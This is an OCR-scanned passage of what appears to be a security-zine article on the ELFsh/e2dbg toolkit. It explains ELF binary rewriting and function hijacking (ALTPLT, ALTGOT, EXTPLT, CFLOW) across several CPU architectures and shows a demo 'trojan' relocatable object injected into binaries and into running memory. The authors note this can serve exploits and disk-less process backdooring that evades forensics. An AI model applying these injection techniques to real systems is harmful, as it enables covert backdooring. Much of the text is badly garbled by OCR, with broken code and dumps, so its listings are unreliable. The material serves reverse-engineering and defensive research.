043] 0x00000000 -------— .debug_frame foff:00040832 sz:0000072 link: 
044] 0x00000000 ---ms-- .debug_str foff:00040904 sz:0008067 link: 
045] 0x00000000 ------- -debug_macinfo foff:00048971 sz:0029295 link: 
046] 0x00000000 -------— .shstrtab fFoff:00078266 sz:0000507 link: 
047] 0x00000000 -------— .symtab fFoff:00080736 sz:0002368 link: 
048] 0x00000000 -------— .strtab foff:00083104 sz:0001785 link: 
SHT_DYNAMIC] 
Object ./testsuite/etrel_inject/etrel_original/fake_aout] 
00] Name of needed library => libc.so.6 {DT_NEED 
O01] Address of init function => 0x08048348 {DT_INIT 
02] Address of fini function => OxO080486E0 {DT_FINT} 
03] Address of symbol hash table => 0x08048168 {DT_HASH} 
04] Address of dynamic string table => OxO0804AA44 {DT_STR 
05] Address of dynamic symbol table => OxO0804A8E4 {DT_SYM 
06] Size of string table => 00000127 bytes {DT_STRSZ} 
O07] Size of symbol table entry => 00000016 bytes {DT_SYM 
08] Debugging entry (unknown) => 0x00000000 {DT_DEB 
09] Processor defined value => Ox0804A894 {DT_PL 
10] Size in bytes for .rel.plt => 000072 bytes {DT_PLTRE 
11] Type of reloc in PLT => 00000017 {DT_PLT 
12] Address of .rel.plt => Ox0804AB34 {DT_JMP 
13] Address of .rel.got section => Ox0804AB24 {DT_RE 
14] Total size of .rel section => 00000016 bytes {DT_RE 
15] Size of a REL entry => 00000008 bytes {DT_REL 
16] SUN needed version table => Ox80482E0 {DT_VERNEE 
17] SUN needed version number => 001 {DT_VERNEEDN 
18] GNU version VERSYM => 0x080482C8 DT_VERSYM} 

END DUMP 18 


As you can see, various sections has been copied and extended, 
and their entries in .dynamic changed. That holds for .got 
(DT_PLTGOT), .rel.plt (DT_JMPREL), .dynsym (DT_SYMTAB), and 
-dynstr (DT_STRTAB). Changing those entries allow for the 

new ALTPLT technique without any line of assembly. 


ma 


Of course the ALTPLT technique version 3 does not need any 
non-mandatory information like debug sections. It may sound 
obvious but some peoples really asked this question. 


---[ C. ALTGOT technique : the RISC complement 


On the MIPS architecture, calls to PLT entries are 


9.txt Wed Apr 26 09:43:45 2017 21 


done differently. Indeed, instead of a direct call instruction on 
the entry, an indirect jump is used for using the GOT entry linked 
to the desired function. If such entry is filled, then the 
function is called directly. By default, the GOT entries contains 
the pointer on the PLT entries. During the execution eventually, 
the dynamic linker is called for relocating the GOT section (MIPS, 
x86) or the PLT section (on SPARC or ALPHA). 


Here is the MIPS assembly log that prove this on some dumb 
helloworld program using printf 


00400790 <main>: 


00790: 3clcOfc0 lui gp, Oxfc0 # Set GP to GOT base 
00794: 279c78c0 addiu gp, gp, 30912 address + 0Ox7ff0 
00798: 0399e021 addu gp,gp,t9 using t9 (= main) 
0079c: 2 ]bdffel addiu sp, sp,-32 

O0O07a0: afbf00lc sw ra,28 (sp) 

007a4: afbe0018 sw s8,24 (sp) 

007a8: O3a0f021 move s8,sp 

OO07ac: afbc0010 sw gp, 16(sp) 

OO7b0: 8f828018 lw v0,-32744 (gp) 


007b4: 00000000 nop 
007b8: 24440a50 addiu a0,v0,2640 


OO07be: 2405002a li al,42 

OO07cO: 8f828018 lw v0,-32744 (gp) 

007c4: 00000000 nop 

O07c8: 24460a74 addiu a2,v0,2676 

OO07cc: 8f£99803c lw t9,-32708 (gp) Load printf GOT entry 
007d0: 00000000 nop 

OO07d4: 0320f809 jalr t9 and jump on it 
007d8: 00000000 nop 

O07de: 8fdc0010 lw gp,16(s8) 

007e0: 00001021 move v0, zero 

0O07e4: O3c0e821 move sp,s8 

OO07e8: 8fbf001c lw ra,28 (sp) 

OO07ec: 8fbe0018 lw s8,24 (sp) 

O0O07£0: 27bd0020 addiu sp, sp, 32 

OO7f4: O03e00008 jr ra # return from the func 


O007£8: 00000000 nop 


4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4007fc: 00000000 nop 


We note that the global pointer register %gp is always set 
on the GOT section base address on MIPS, more or less some 
fixed signed offset, in our case O0x7ff0 (0x8000 on ALPHA). 


In order to call a function whoose address is unknown, the GOT 
ntries are filled and then the indirect jump instruction 

on MIPS does not use the PLT entry anymore. What do we learn 
from this ? Simply that we cannot rely on a classical PLT 
hijacking because the PLT entry code wont be called if the GOT 
e 

f 


ntry is already filled, which means that we will hijack the 
unction only the first time. 


Because of this, we will hijack functions using GOT patching 
on MIPS. However it does not resolve the problem of recalling 
the original function. In order to allow such recall, we will 
just insert the old_ symbols on the real PLT entry, so that 
we can still access the dynamic linking mechanism code stub 
even if the GOT has been modified. 


Let’s s the detailed results of the ALTGOT technique on the 
ALPHA and MIPS architecture. It was done without a single 
line of assembly code which makes it very portable 


========= BEGIN DUMP 19 ========= 


elfsh@alpha$S cat host.c 


9.txt 


Wed Apr 26 09:43:45 2017 


#include <stdio.h> 
#finclude <stdlib.h> 
#include <unistd.h> 


int main() 


{ 


char 


str = 


if ( 


*str; 


malloc(10); 
NULL) 


str 


goto err; 


strcpy 
printf 


fflu 
puts 


printf("Second_printf %u\n", 


puts 

fflu 

retu 
err: 


printf("Malloc problem %Su\n", 


retu 


elfsh@ 


(stir; “eest™) + 
("First_printf %s\n", 
sh(stdout); 
("First_puts"); 


("Second_puts"); 
sh(stdout); 
inn CO); 


rm (F2)5 


elfsh@ 


alpha$ gcc host.c -o a.out 
alpha$ file ./a.out 


a.out: 


elfsh@ 
First_ 
First_ 


ELF 64-bit LSB executable, 
dynamically linked, 


ND DUMP 19 


cal 


=== BEGIN DUMP 20 


alpha$S ./a.out 
printf test 
puts 


Second_printf 42 


Second_puts 


elfsh@ 
inclu 
inclu 
inclu 


int 
int 
char 
short 


=== END DUMP 20 ========== 


=== BEGIN DUMP 21 


alpha$ cat rel.c 

de <stdio.h> 

de <stdlib.h> 

de <unistd.h> 
glvar_testreloc = 42; 

glvar_testreloc_bss; 

glvar_testreloc_bss2; 

glvar_testreloc_bss3; 


puts_troj(char *str) 


local = 
*str2; 


1; 


Str); 


42); 


42); 


Alpha 


not stripped 


The original binary executes: 


Let’s look again the relocatabl 


22 


(unofficial), 


for NetBSD 2.0G, 


injecting: 


object w 


ar 
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str2 = malloc(10); 
*ste2 S40; 
*(str2 + 1) = 0x00; 
glvar_testreloc_bss 43; 
glvar_testreloc_bss2 = 44; 
glvar_testreloc_bss3 = 45; 
printf("Trojan injected ET_REL takes control now " 
"($s:%s:%Su:%u: Shhu:Shu:%u] \n", 
str2, str, 
glvar_testreloc, 
glvar_testreloc_bss, 
glvar_testreloc_bss2, 
glvar_testreloc_bss3, 
local); 
old_puts (str); 
fflush(stdout); 
return (0); 
} 
int func2 () 
{ 
return (42); 
} 
========= END DUMP 21 ========= 
As you can see, the relocatable object rel.c uses old_ symbols 
which means that it relies on the ALTPLT technique. However 
we do not perform EXTPLT technique on ALPHA and MIPS yet so 
we are not able to call unknown function from the binary on 
those architectures for now. Our rel.c is a copy from the one 
in example 7 without the calls to the unknown functions 
write and putchar of example 7. 
Now we inject the stuff: 
=SSSS====== BEGIN DUMP 22 sr 
elfsh@alpha$ ./relinject.esh > relinject.out 
elfsh@alpha$ ./fake_aout 
First_printf test 
Trojan injected ET_REL takes control now [Z:First_puts:42:43:44:45:1] 
First_puts 
Second_printf 42 
Trojan injected ET_REL takes control now [Z:Second_puts:42:43:44:45:1] 
Second_puts 
SSSS===== FND DUMP 22 ee 


loo 


elfsh@alph 


[*] 


[The section list on ALPHA is then as follow. 


A particular 


k at the injected sections is recommended 
BEGIN DUMP 23 ========= 
aS elfsh -f fake_aout -s -p 


Object fake_aout has been loaded 


[SECTION H 
[Object fa 


FADER TABL 
ke_aout] 


S) 


(O_RDONLY ) 


HT is not stripped] 
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000] 0x000000000 —------ foff:00000 sz:00000 
001] 0x120000190 a------— .interp fFoff:00400 sz:00023 
002] Ox1200001A8 a -note.netbsd.ident foff:00424 sz:00024 
003] 0x1200001C0O a------— -hash foff:00448 sz:00544 
004] 0x1200003E0 a------— dynsym foff:00992 sz:00552 
005] O0x120000608 a------ dynstr Foff:01544 sz:00251 
006] 0x120000708 a------— rela.dyn foff:01800 sz:00096 
007] 0x120000768 a------— rela.plt foff:01896 sz:00168 
008] 0x120000820 a-x---- .init foff:02080 sz:00128 
009] Ox1200008A0 a-x---- .text foff:02208 sz:01312 
010] Ox120000DCO a-x---- .fini foff:03520 sz:00104 
011] Ox120000E28 a------ rodata Foff:03624 sz:00162 
012] 0x120010EDO aw----— data foff:03792 sz:00000 
013] Ox1l20010ED0O a------ .eh_frame fFoff:03792 sz:00004 
014] Ox120010ED8 aw----- dynamic fFoff:03800 sz:00352 
015] 0x120011038 aw----- ctors fFoff:04152 sz:00016 
016] 0x120011048 aw----- dtors Foff:04168 sz:00016 
017] 0x120011058 aw-----— jer foff:04184 sz:00008 
018] 0x120011060 awx---- .plt Foff:04192 sz:00116 
019] 0x1200110D8 aw-----— got foff:04312 sz:00240 
020] Ox1200111C8 aw----- sdata Foff:04552 sz:00024 
021] Ox1200111EO aw----- sbss fFoff:04576 sz:00024 
022] O0Ox1200111F8 aw----- -bss fFoff:04600 sz:00056 
023] 0x120011230 a-x rel.o.text foff:04656 sz:00320 
024] 0x120011370 aw----- rel.o.sdata fFoff:04976 sz:00008 
025] 0x120011378 a--ms-- rel.o.rodata.strl1.1 foff:04984 sz:00072 
026] 0x1200113C0 a-x---- .alt.plt.prolog Foff:05056 sz:00048 
027] 0x1200113F0 a-x---- .alt.plt foff:05104 sz:00120 
028] 0x120011468 a------— -alt.got foff:05224 sz:00072 
029] 0x1200114B0 aw----- rel.o.got Foff:05296 sz:00080 
030] 0x000000000 —------ comment fFoff:05376 sz:00240 
031] 0x000000000 ------- debug_aranges Foff:05616 sz:00048 
032] 0x000000000 ------- debug_pubnames Foff:05664 sz:00027 
033] 0x000000000 —------ debug_info foff:05691 sz:02994 
034] 0x000000000 -------— debug_abbrev foff:08685 sz:00337 
035] 0x000000000 -—------ debug_line Foff:09022 sz:00373 
036] 0x000000000 -—------ debug_frame foff:09400 sz:00048 
037] Ox000000000 ---ms-- .debug_str Foff:09448 sz:01940 
038] 0x000000000 ------- debug_macinfo Foff:11388 sz:12937 
039] 0x000000000 -------— .ident foff:24325 sz:00054 
040] 0x000000000 -------— .shstrtab Foff£:24379 sz:00393 
041] 0x000000000 -------— .symtab foff:27527 sz:02400 
042] 0x000000000 ------- .strtab foff:29927 sz:00948 
Program header table PHT] 
Object fake_aout] 
00] Ox120000040 —-> 0x120000190 r-x => Program header table 
O01] Ox120000190 -> 0x1200001A7 r-- => Program interpreter 
02] 0x120000000 -> Ox1l20000ECA r-x => Loadable segment 
03] Ox120010ED0O —-> 0x120011510 rwx => Loadable segment 
04] Ox1l20010ED8 —-> 0x120011038 rw- => Dynamic linking info 
05] Ox1200001A8 -—> 0x1200001C0O r-- => Auxiliary information 
Program header table SHT correlation] 
Object fake_aout] 
*] SHT is not stripped 
00] PT_PHDR 
01] PT_INTERP .interp 
02] PT_LOAD -interp .note.netbsd.ident .hash .dynsym .dynstr 
-rela.dyn .rela.plt .init .text .fini .rodata 
03] PT_LOAD -data .eh_frame .dynamic .ctors .dtors .jcr .plt 
-got .sdata .sbss .bss rel.o.text rel.o.sdata 
rel.o.rodata.strl.1l .alt.plt.prolog .alt.plt 
-alt.got rel.o.got 
[04] PT_DYNAMIC .dynamic 


9.txt 
[05] PT_N 


[*] Objec 


—-—[, Ds. EX 


Wed Apr 26 09:43:45 2017 25 


OTE -note.netbsd.ident 


t fake_aout unloaded 


END DUMP 23 ========= 


Segments ar xtended the good way. We see this because of 

the correlation between SHT and PHT : all bounds are correct. 
the end. The .alt.plt.prolog section is there for implementing 
the ALTPLTv2 on ALPHA. This could will patch in runtime the 
f 
Le 
Ss 


irst ALTPLT entry bytes with the first PLT entry bytes on 
he first time that ALTPLT first entry is called (when calling 
ome original function from a hook function for the first time). 


When we discovered how to do the ALTPLTv3 (without a line 
of assembly), then .alt.plt.prolog just became a padding 
section so that GOT and ALTGOT were well aligned on some 
size that was necessary for setting up ALTPLT because of 
the ALPHA instruction encoding of indirect control flow 
jumps. 


[PLT technique : unknown function postlinking 


This technique is one of the major one of the new E 
version. It works on ET_EXEC and ET_DYN files, including 
when the injection is done directly in memory. EXTP 
consists in adding a new section (.elfsh.extplt) so that 
we can add entries for new functions. 


When coupled to .rel.plt, .got, .dynsym, and .dynstr mirroring 
extensions, it allows for placing relocation entries that match 
the needs of the new ALTPLT/ALTGOT couple. Let’s look at the 
additional relocation information using the elfsh -r command. 


First, let see the original binary relocation table: 


BEGIN DUMP 24 ========= 


*] Object ./a.out has been loaded (O_RDONLY) 

RELOCATION TABLES] 

Object ./a.out] 

Section .rel.dyn} 

000] R_386_GLOB_DAT 0x08049850 sym[010] : gmon_start 

001] R_386_COPY 0x08049888 sym[004] : stdout 

Section .rel.plt} 

000] R_386_JMP_SLOT 0x08049860 sym[001] : fflush 

001] R_386_JMP_SLOT 0x08049864 sym[002] : puts 

002] R_386_JMP_SLOT 0x08049868 sym[003] : malloc 

003] R_386_JMP_SLOT 0x0804986C sym[005] : libc_start_main 
004] R_386_JMP_SLOT 0x08049870 sym[006] : printf 

005] R_386_JMP_SLOT 0x08049874 sym[007] : free 

006] R_386_JMP_SLOT 0x08049878 sym[009] : read 

*] Object ./testsuite/etrel_inject/etrel_original/a.out unloaded 


END DUMP 24 ========= 


Let’s now see the modified binary relocation tables: 


*] 


REL 
Obj 


Sec 
000 
001 


sec 
000 
001 
002 
003 
004 
005 
006 


sec 
000 
001 


Sec 
000 
001 
002 
003 
004 
005 
006 
007 
008 


*] 
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===== BEGIN DUMP 


Object fake_aout 


has been loaded 


OCATION TABLES] 

ect ./fake_aout] 

tion .rel.dyn} 
R_386_GLOB_DAT 0x08049850 sym 
R_386_COPY 0x08049888 sym 

tion .rel.plt} 
R_386_JMP_SLOT 0x0804A8A0 sym 
R_386_JMP_SLOT 0x0804A8A4 sym 
R_386_JMP_SLOT 0x0804A8A8 sym 
R_386_JMP_SLOT 0x0804A8AC sym 
R_386_JMP_SLOT 0x0804A8BO sym 
R_386_JMP_SLOT 0x0804A8B4 sym 
R_386_JMP_SLOT 0x0804A8B8 sym 

tion .elfsh.reldyn} 
R_386_GLOB_DAT 0x08049850 sym 
R_386_COPY 0x08049888 sym 

tion .elfsh.relplt} 
R_386_JMP_SLOT 0x0804A8A0 sym 
R_386_JMP_SLOT 0x0804A8A4 sym 
R_386_JMP_SLOT 0x0804A8A8 sym 
R_386_JMP_SLOT 0x0804A8AC sym 
R_386_JMP_SLOT 0x0804A8BO sym 
R_386_JMP_SLOT 0x0804A8B4 sym 
R_386_JMP_SLOT 0x0804A8B8 sym 
R_386_JMP_SLOT 0x0804A8BC sym 
R_386_JMP_SLOT 0x0804A8CO sym 

Object fake_aout unloaded 

===== END DUMP 25 ========= 

As you see, _IO_putc 


functions has been used in th 


26 
(O_RDONLY ) 
010 gmon_start 
004 stdout 
001 fflush 
002 puts 
003 malloc 
005 libc_start_main 
006 printf 
007 free 
009 read 
010 gmon_start 
004 stdout 
001 fflush 
002 puts 
003 malloc 
005 libc_start_main 
006 printf 
007 free 
009 read 
O11 LO spure 
012 write 


(internal name for putchar) 


and write 
We had to 


injected object. 


insert them inside the host binary so that the output binary 


can work. 


The .elfs 


section but with a doubl 
ional 


for addit 


entries. 


h.relplt section is copied from the 
led size so that we have room 


relocatio 
on ET_DYN 


but also 
-rel.plt 
and .elfs 


n table, 


files, 


-rel.plt 


Even if we extend only one of the 
both tables needs to b 
the rtld will assume that both tables 
are adjacent in memory, 


copied, becaus 


so we cannot just copy .rel.plt 
need to keep .rel.dyn (aka .rel.got) near the 
copy. That is why you can see with .elfsh.reldyn 
h.relplt 


When extra symbols are needed, more sections are moved 


after the 


E. IA32, 


Let’s now give all 
introduced by the practice in the previous paragraphs. 
ELF redirections. 


SPARC32/64, 


BSS, 


ALPHAG4, 


cover here all pseudos algorithms for 


constrained debugging detailed algorit 


of the next 


part. 


including .dynsym and .dynstr. 


MIPS32 compliant algorithms 


algorithms details about the techniques we 


We 
More 


hms are given at the end 
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Because of ALTPLT and ALTGOT techniques are so complementary, 


W 


imp 


now. T 
it is the default architecture case in the listing. 


lemented them inside only one algorithm that we give 
here is no conditions on the SPARC architecture since 


The main ALTPLTv3 / ALTGOT algorithm (libelfsh/altplt.c) can be 
found in elfsh_build_plt() and elfsh_relink_plt(), is as 


follow. 


It could probably be cleaned if all the code go in architecture 
dependant handlers but that would duplicate some code, so we 
keep it like this 


Multiarchitecture ALTPLT / ALTGOT algorithm 


0/ 


2/ 


3/ 


] 
SWI 


MIP 


ALP 


DEFAULT: 


FORI 


[ ARCH is MIPS AND PLT is not found AND File is dynamic ] 


Get .text section base address 

— Find MIPS opcodes fingerprint for embedded PLT 
located inside .text 

— Fixup SHT to include PLT section header 


TCH on ELF architecture 


S: 

* Insert mapped .elfsh.gotprolog section 
* Insert mapped .elfsh.padgot section 
HA: 
* Insert mapped .elfsh.pltprolog section 


* Insert mapped .elfsh.altplt section (copy of .plt) 


[ ARCH is (MIPS or ALPHA or IA32) ] 


* Insert .elfsh.altgot section (copy of .got) 


EACH (ALT)PLT ENTRY: 
IF [ FIRST PLT entry ] 


IF [ARCH is MIPS ] 
[ 

* Insert pairs of ld/st instructions in 
-elfsh.gotprolog for copying extern variables 
addresses fixed in GOT by the RTLD inside 
ALTGOT section. See MIPS altplt handler 
in libelfsh/mips32.c 


ELSE IF [ ARCH is IA32 ] 


* Reencode the first PLT entry using GOT - ALTGOT 
address difference (so we relocate into ALTGOT 
instead of GOT) 


IF [ ARCH is MIPS ] 
* Inject OLD symbol on current PLT entry 


* Inject OLD symbol on current ALTPLT entry 


IF [ ARCH is ALPHA ] 
* Shift relocation entry pointing at current location 
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IF [ ARCH is IA32 ] 
* Reencode PLT and ALTPLT current entry 
] 


4/ SWITCH on ELF architecture 
[ 


MIPS: 

TA32: 
* Change DT_PLTGOT entry from GOT to ALTGOT address 
* Shift GOT related relocation 

SPARC: 
* Change DT_PLTGOT entry from PLT to ALTPLT address 
* Shift PLT related relocations 


On MIPS, there is no relocation tables inside ET_EXEC binaries. 
If we want to shift the relocations that make reference to GOT 
inside the MIPS code, we need to fingerprint such code patterns 
so that we fix them using the ALTGOT - GOT difference. They ar 
easily found since the needed patches are always on the same 
binary instructions pattern 


3c1c0000 lui gp, 0x0 
279c0000 addiu gp,gp,0 
The zero fields in those instructions should be patched at 
linking time when they match HI16 and LO16 MIPS relocations. 
However this information is not available in a table for 
ET_EXEC files, so we had to find them back in the binary code. 
It way easier to do this on RISC architectures since all 
instructions are the same length so false positives are very 
unlikely to happen. Once we found all those patterns, we fix 
them using the ALTGOT-GOT difference in the relocatable fields. 
Of course, we wont change ALL references to GOT inside the 
code, because that would result in just moving the GOT without 
performing any hijack. We just fix those references in the 
first O0Ox100 bytes of .text, and in .init, .fini, that means 
only the references at the reserved GOT entries (filled with 
dl-resolve virtual address and linkmap address). That way, we 
make the original code use the ALTGOT section when accessing 
reserved entries (since they have been runtime relocated in 
ALTGOT and not GOT) and the original GOT entries when accessing 
the function entries (so that we can hijack functions using 
GOT modification). 


EXTPLT algorithm 


The EXTPLT algorithm fits well in the previous algorithm. We 
just needed to add 2 steps in the previous listing 


Step 2 BIS : Insert the EXTPLT (copy of PLT) section on 
supported architectures. 


Step 5 : Mirror (and extend) dynamic linking sections on 
supported architectures. Let’s give more details 
about this algorithm implemented in 
libelfsh/extplt.c. 


* Mirror .rel.got (.rel.dyn) and .rel.plt sections after BSS, 
with a double sized mirror sections. Those 2 sections needs to 
stay adjacent in memory so that EXTPLT works on ET_DYN objects 
as well. 
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* Update DT_REL and DT_JMPREL entries in .dynamic 


* Mirror .dynsym and .dynstr sections with a double size 


* Update DT_SYMTAB and DT_STRTAB entries in .dynamic 


Once those operations are done, we have room in all the various 
dynamic linking oriented sections and we can add on-demand 
dynamic symbols, symbols names, and relocation entry necessary 
for adding extra PLT entries in the EXTPLT section. 


B- 


Then, each time we encounter a unknown symbol in the process of 
relocating a ET_REL object inside a ET_EXEC or ET_DYN object, 
we can use the REQUESTPLT algorithm, as implemented in 
elfsh_request_pltent() function in the libelfsh/extplt.c file 


* Check room in EXTPLT, RELPLT, DYNSYM, DYNSTR, and 
ALTGOT sections. 


* Initialize ALTGOT entry to EXTPLT allocated new entry. 


* 
El 


ncode EXTPLT entry for using the ALTGOT entry. 


* Insert relocation entry inside .elfsh.relplt for ALTGOT 
new entry. 


* Add relocation entry size to DT_PLTRELSZ entry value in 
.dynamic section. 


* Insert missing symbol in .elfsh.dynsym, with name inserted in 
.elfsh.dynstr section. 


* Add symbol name length to DT_STRSZ entry value in .dynamic 
section. 


This algorithm is called from the main ET_REL injection and 
relocation algorithm each time the ET_REL object use an unknown 
function whoose symbol is not present in the host file. The 

new ET_REL injection algorithm is given at the end of the 
constrained debugging part of the article. 


CFLOW algorithm 


This technique is implemented using an architecture dependant 
backend but the global algorithm stays the same for all 
architectures 


— Create .elfsh.hooks sections (only 1 time) 
— Find number of bytes aligned on instruction size 
* Using libasm on IA32 
* Manually on RISC machines 
—- Insert HOOK entry on demand (see CFLOW dump for format) 
—- Insert JMP to hook entry in hijacked function prolog 
- Align JUMP hook on instruction size with NOP in hijacked prolog 
- Insert hook_funcname and old_funcname symbols in hook entry for 
beeing able to call back the original function. 


The technique is PaX safe since it does not need any runtime 
bytes restoration step. We can hook the address of our choice 
using the CFLOW technique, however executing the original bytes 
in the hook entry instead of their original place will not work 
when placing hooks on relative branching instructions. Indeed, 
relatives branching will be resolved to a wrong virtual address 
if w xecute their opcodes at the wrong place (inside 
.elfsh.hooks instead of their original place) inside the 
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process. Remember this when placing CFLOW hooks : it is not 
intended to hook relative branch instructions. 


Sa SSse5 [ V. Constrained Debugging 


In nowadays environment, hardened binaries are usually 
of type ET_DYN. We had to support this kind of injection 
Since it allows for library files modification as much 


powerful as the the executable files modification. 


Moreover 


some distribution comes with a default binary set compiled 


in 


ET_DYN, such as hardened gentoo. 


Another improvement that we wanted to be done is the ET_R 


relocation in memory. 


the 


so it reduces forensics 


EL 


The algorithm for it is the same than 


ondisk injection, but this time the disk is not changed 


vidences like in [12]. It is believed 


that this kind of injection can be used in exploits and direct 


process backdooring without touching the hard disk. Evil eh ? 


We are aware of another implementation of the ET_REL injection 
into memory [10]. Ours supports a wider range of architecture and 
couples with the EXTPLT technique directly in memory, which 


was 


A last technique t 


not previously implemented to our knowledge. 


hat we wanted to develop was about extending 


and debugging static executables. We developed this new technique 
that we called EXTSTATIC algorithm. It allows for static 


injections by taki 
missing. 


that more than one relocatable file taken from libc.a is 
injected at a time using a recursive dependency algorithm 


REL relocation in memory 


ng parts of libc.a when functions or code is 
The same ET_REL injection algorithm is used except 


Because we want to be able to provide a handler for breakpoints 


as they are specified, we allow for direct mapping of an 
object into memory. We use extra mmap zone for this, always 


ET_REL 


taking care that it does not break PaX : we do not map any zone 
beeing both executable and writable. 


In e2dbg, breakpoints can be implemented in 2 ways. Either an 
architecture specific opcode (like OxCC on IA32) is used on the 


desired redirected access, or the CFLOW/ALTPLT primitives 
used in runtime. In the second case, the mprotect system 


call must be used to be able to modify code at runtime. 


can be 


However 


we may be able to get rid of mprotect soon for runtime injections 
as the CFLOW techniques improves for beeing both static and 
runtime PaxX safe. 


Let’s look at some simple binary that does just use printf and 
and puts to understand more those concepts: 


s=s====== BEGIN DUMP 26 ========= 
elfsh@WTH $ ./a.out 

[host] main arge 1 

[host] argv[0] is : ./a.out 


First_printf test 


First_puts 


Second_printf test 


Second_puts 
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LEGIT FUNC 
legit func 
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(test) ! 


END DUMP 26 


017 31 


We use a small elfsh script as e2dbg so that it creates 


another file with the debugger injected inside it, 
regular elfsh techniques. 


EGIN DUMP 27 
elfsh@WTH $ cat inject_e2dbg.esh 
!../../vm/elfsh 

load a.out 

set l.dynamic[08].val 0x2 


using 


Let’s look at it 


# entry for DT_D 


E BUG 


modified binary. 


set 1l.dynamic[08].tag DT_NEEDED 

redir main e2dbg_run 

save a.out_e2dbg 

SSS====== FND DUMP 27 —— 
We then execute th 

========= BEGIN DUMP 28 ========= 


elfsh@WTH S$ ./aout_e2dbg 


The Embedded ELF Debugger 0.65 (32 bits built) 
This software is under the General Public License V.2 
Please visit http://www.gnu.org 
*] Sun Jul 31 16:24:00 2005 - New object ./a.out_e2dbg loaded 
*] Sun Jul 31 16:24:00 2005 - New object /lib/tls/libc.so.6 loaded 
*] Sun Jul 31 16:24:00 2005 - New object ./ibc.so.6 loaded 
*] Sun Jul 31 16:24:00 2005 - New object /lib/ld-linux.so.2 loaded 
*] Sun Jul 31 16:24:00 2005 - New object /lib/libelfsh.so loaded 
*] Sun Jul 31 16:24:00 2005 - New object /lib/libreadline.so.5 loaded 
*] Sun Jul 31 16:24:00 2005 - New object /lib/libtermcap.so.2 loaded 
*] Sun Jul 31 16:24:00 2005 - New object /lib/libdl.so.2 loaded 
*] Sun Jul 31 16:24:00 2005 - New object /lib/libncurses.so.5 loaded 
(e2dbg-0.65) quit 
[..: Embedded ELF Debugger returns to the grave | 
[e2dbg_run] returning to 0x08045139 
[host] main arge 1 
[host] argv[0] is ./a.out_e2dbg 


First_printf test 
First_puts 

Second_printf test 
Second_puts 
LEGIT FUNC 
legit func 


(test) ! 


elfsh@WTH $ 


END DUMP 28 


Okay, 
interresting like 


that was easy. W 
ET_RI 


hat if we want to do something more 
EL object injection into memory. We 


will make use of t 


he profile command so that we can see 
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the autoprofiling feature of e2dbg. 


32 


This command is always 


useful to learn more about the internals of the debugger, 
and for internal debugging problems that may occur while 
developping it. 


Our cheap fu 
more understandabl] 


ELFSH_PROFIL 


EK {OUT, 


and libelfsh/error.c 


We will also print the linkmap list. 
are OS independant. 


in libel 


the 


nction calls pattern matching makes the output 
le than a raw print of profiling information 
and took only a few hours to implement using 


ERR, ROUT} macros fsh-internals.h 


The linkmap first fields 
There are a lot of other internal fields 


that we do not display here but a lot of information could 
be grabbed from there as well. 


See the stuff in action 


elfsh@WTH $ 


Ae Oh SR OR oh OR SR OSE. Ob 


The 


Su 
Su 
Su 
Su 
Su 
Su 
Su 
Su 
Su 


Cy G4 sy (Gy GG FG |. *E, -EY 


PPD VDDD DDD 


GG KS GEOG GF Gs EG 
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O1 
02 
03 
04 
05 
06 
07 
08 
09 
10 


EGIN DUMP 29 


./a.out_e2dbg 


Linkmap entries 


addr 
addr 
addr 
addr 
addr 
addr 
addr 
addr 
addr 
addr 


(e2dbg-0.65) 


O01 
002 
003 
004 
005 
006 
007 
008 
009 


Working fil 
Jul 


Su 
Su 
Su 
Su 
Su 
Su 
Su 
Su 
Su 


n 


PYPYPDVPDVDDNDD DD 


{ corpae cy wae Ce, CO a 


aqaquqgaq 


-i:. ELFsh m F 
*] No loaded module 


GEOG MG GE SG Gh GG 


Embedded ELF Debugger 0.65 (32 bits built) 

This software is under the General Public License V.2 
Please visit http://www.gnu.org 

31 16:12:48 2005 - New object ./a.out_e2dbg loaded 

31 16:12:48 2005 - New object /lib/tls/libc.so.6 loaded 
31 16:12:48 2005 - New object ./ibc.so.6 loaded 

31 16:12:48 2005 - New object /lib/ld-linux.so.2 loaded 
31 16:12:48 2005 - New object /lib/libelfsh.so loaded 
31 16:12:48 2005 - New object /lib/libreadline.so.5 loaded 
31 16:12:48 2005 —- New object /lib/libtermcap.so.2 loaded 
31 16:12:48 2005 - New object /lib/libdl.so.2 loaded 

31 16:12:48 2005 - New object /lib/libncurses.so.5 loaded 
linkmap 

0x00000000 dyn Ox080497D4 — 

0x00000000 dyn OxFFFFE590 — 

OxB7E73000 dyn OxB7F9AD3C - /lib/tls/libc.so. 
OxB7E26000 dyn OxB7E6FO1C - ./ibc.so.6 

OxB7FB9000 dyn OxB7FCFF14 - /lib/ld-linux.so. 
OxB7DF3000 dyn OxB7E24018 - /lib/libelfsh.so 
OxB7DC6000 dyn OxB7DEE46C — /lib/libreadline.so.5 
OxB7DC2000 dyn OxB7DC5BB4 - /lib/libtermcap.so.2 
OxB7DBEOO0OO dyn OxB7DCOEEC - /lib/libdl.so.2 
OxB7D7C000 dyn OxB7DBB1CO - /lib/libncurses.so.5 

list 

ese: 

l 31 16:24:00 2005 D ID: 9 /lib/libncurses.so.5 

lL 31 16:24:00 2005 D ID: 8 /lib/libdl.so.2 

1 31 16:24:00 2005 D ID: 7 /lib/libtermcap.so.2 

l 31 16:24:00 2005 D ID: 6 /lib/libreadline.so.5 

| 31 16:24:00 2005 D ID: 5 /lib/libelfsh.so 

1 31 16:24:00 2005 D ID: 4 /lib/ld-linux.so.2 

lL 31 16:24:00 2005 D ID: 3 ./ibc.so.6 

lL 31 16:24:00 2005 D ID: 2 /lib/tls/libc.so.6 

L 31 16:24:00 2005 *D ID: 1 ./a.out_e2dbg 
odules 
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source ./etrelmem.esh 


“load myputs.o 
[*] Sun Jul 31 16:13:32 2005 - New object myputs.o 
[!!] Loaded file is not the linkmap, 
“switch 1 

fe] 


Switched on object 1 (./a.out_e2dbg) 


“mode dynamic 
[*] e2dbg is now in DYNAMIC mode 


~“reladd 1 10 


Lael 


ET_REL myputs.o injected succesfully in 


“profile 
Profiling enable 


+ <vm_print_actual@loop.c:38> 

“redir puts myputs 

+ <vm_implicit@implicit.c:91> 

+ <cmd_hijack@fcthijack.c:19> 

+ <elfsh_get_metasym_by_name@sym_common.c:283> 

+ <elfsh_get_dynsymbol_by_name@dynsym.c:255> 

+ <elfsh_get_dynsymtab@dynsym.c:87> 

+ <elfsh_get_raw@section.c:691> 

--[ <elfsh_get_raw@section.c:691> 

P] --- Last 1 function(s) recalled 1 time(s) --- 
